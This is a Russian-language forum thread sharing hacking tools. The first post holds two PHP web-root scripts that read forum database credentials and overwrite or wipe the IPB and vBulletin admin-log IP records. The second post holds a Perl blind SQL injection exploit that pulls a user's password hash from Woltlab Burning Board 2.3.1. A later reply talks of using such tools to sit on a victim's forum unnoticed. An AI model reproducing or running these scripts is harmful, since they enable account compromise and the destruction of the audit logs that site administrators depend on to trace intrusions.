Анти Патсано-Хулиганский Портал

Объявление

Свяжитесь с администрацией, чтобы зарегистрироватся.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Анти Патсано-Хулиганский Портал » Свалка » Чистка логов в IPB и vBulletin


Чистка логов в IPB и vBulletin

Сообщений 1 страница 4 из 4

1

Пара скриптов от gemaglabinа которые могут поменять ip адреса в логах пребывания в админ панели или полность очистить таблицу.
Скрипты берут информацию для коннекта из конфигурационных файлов форума,те кидать надо в корень сервера. нашел на http://netdefect.net/

Invision Power Board:

PHP код:
<FORM NAME=check METHOD=POST ACTION='?change'>
<TD>Change IP To</TD>
<TD><INPUT NAME=ip TYPE=text CLASS=text Value=></TD>
<TD WIDTH=10%><input class=text type=submit value='change ip'></TD>
</Form>
<FORM NAME=check METHOD=POST ACTION='?clean'>
<TD>Clean  Logs</TD>
<TD WIDTH=10%><input class=text type=submit value='clean logs'></TD>
</Form>
<?php
if (isset($_GET['change']) || isset($_GET['clean']))

require_once('./conf_global.php');

$dbtype  = $INFO ['sql_driver']; 
$dbname  = $INFO ['sql_database'];
$prefix  = $INFO ['sql_tbl_prefix'];
$server  = $INFO ['sql_host'];
$sqluser = $INFO ['sql_user'];
$sqlpass = $INFO ['sql_pass'];

$db      = mysql_connect($server,$sqluser, $sqlpass);
if (!$db) die ("cannot connect to mysql host");
mysql_SELECT_db($dbname);
if (isset($_POST['ip']) && !empty($_POST['ip']))

$newip  = $_POST['ip'];
$sql    = 'UPDATE `'.$prefix.'admin_logs` SET `ip_address` = '.$newip;
$result = mysql_query ($sql);
if (!$result) die("cannot execute sql query ".mysql_error());
echo "all ip addresses were updated to $newip";
}
if (isset($_GET['clean']))
{
$sql     = 'TRUNCATE TABLE `'.$prefix.'admin_logs`';
$result  = mysql_query ($sql);
if (!$result) die("cannot execute sql query ".mysql_error());
echo "all ip addresses were destroyed";
}
}
?>

vBulletion Board:
PHP код:
<FORM NAME=check METHOD=POST ACTION='?change'>
<TD>Change IP To</TD>
<TD><INPUT NAME=ip TYPE=text CLASS=text Value=></TD>
<TD WIDTH=10%><input class=text type=submit value='change ip'></TD>
</Form>
<FORM NAME=check METHOD=POST ACTION='?clean'>
<TD>Clean  Logs</TD>
<TD WIDTH=10%><input class=text type=submit value='clean logs'></TD>
</Form>
<?php
if (isset($_GET['change']) || isset($_GET['clean']))

require_once('./includes/config.php');

$dbtype  = $config['Database']['dbtype']; 
$dbname  = $config['Database']['dbname'];
$prefix  = $config['Database']['tableprefix'];
$server  = $config['MasterServer']['servername'];
$port    = $config['MasterServer']['port'];
$sqluser = $config['MasterServer']['username'];
$sqlpass = $config['MasterServer']['password'];

$db      = mysql_connect($server,$sqluser, $sqlpass);
if (!$db) die ("cannot connect to mysql host");
mysql_SELECT_db($dbname);
if (isset($_POST['ip']) && !empty($_POST['ip']))

$newip  = $_POST['ip'];
$sql    = 'UPDATE `adminlog` SET `ipaddress` = '.$newip;
$result = mysql_query ($sql);
if (!$result) die("cannot execute sql query ".mysql_error());
echo "all ip addresses were updated to $newip";
}
if (isset($_GET['clean']))
{
$sql     = 'TRUNCATE TABLE `adminlog`';
$result = mysql_query ($sql);
if (!$result) die("cannot execute sql query ".mysql_error());
echo "all ip addresses were destroyed";
}
}
?>

0

2

сплоит под знаменитый движок WBB (Woltlab Burning Board) версию 2.3.1. нашел на http://netdefect.net/

PHP код:
#!/usr/bin/perl

use strict;
use IO::Socket::INET;

$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit wwwsecurity-project.org
Exploit by deluxe89
----------
";

my $host = 'www.security-project.org';
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards

# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
    print "[~] Using a proxy\n";
}
else
{
    print "[~] You're using NO proxy!\n";
    sleep(1);
}


#
# Get the hash
#

print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";

my $hash = '';
for(my $i=1;$i<33;$i++)
{
    my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

    if(&test($i, 96)) # buchstabe
    {
        for(my $c=97;$c<103;$c++)
        {
            if(&test($i, $c, 1))
            {
                print pack('c', $c);
                last;
            }
        }
    }
    else # zahl
    {
        #print "0-4\n";
        for(my $c=48;$c<58;$c++)
        {
            if(&test($i, $c, 1))
            {
                print pack('c', $c);
                last;
            }
        }
    }
}
print "\n";

sub test
{
    my ($i, $num, $g) = @_;

    my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
    my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
    $value .= ($g) ? '=' : '>';
    $value .= "$num)/*";
    my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";

    print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";

    while(<$sock>)
    {
        if($_ =~ m/$error/) { return 1; }
    }
    return 0;
}

0

3

может кому-то чем-то поможет

0

4

ребят, насколько я понимают тут не пускают править движок.

+ ты хотите, на сколько я понял, это все тут поставить? имхо толька дыра в безопасности, по айпи не чего не отследишь, хотя с другой стороны поставив такое можно будет сидеть на форуме жертве и у нас одновременно и не палиться

0


Вы здесь » Анти Патсано-Хулиганский Портал » Свалка » Чистка логов в IPB и vBulletin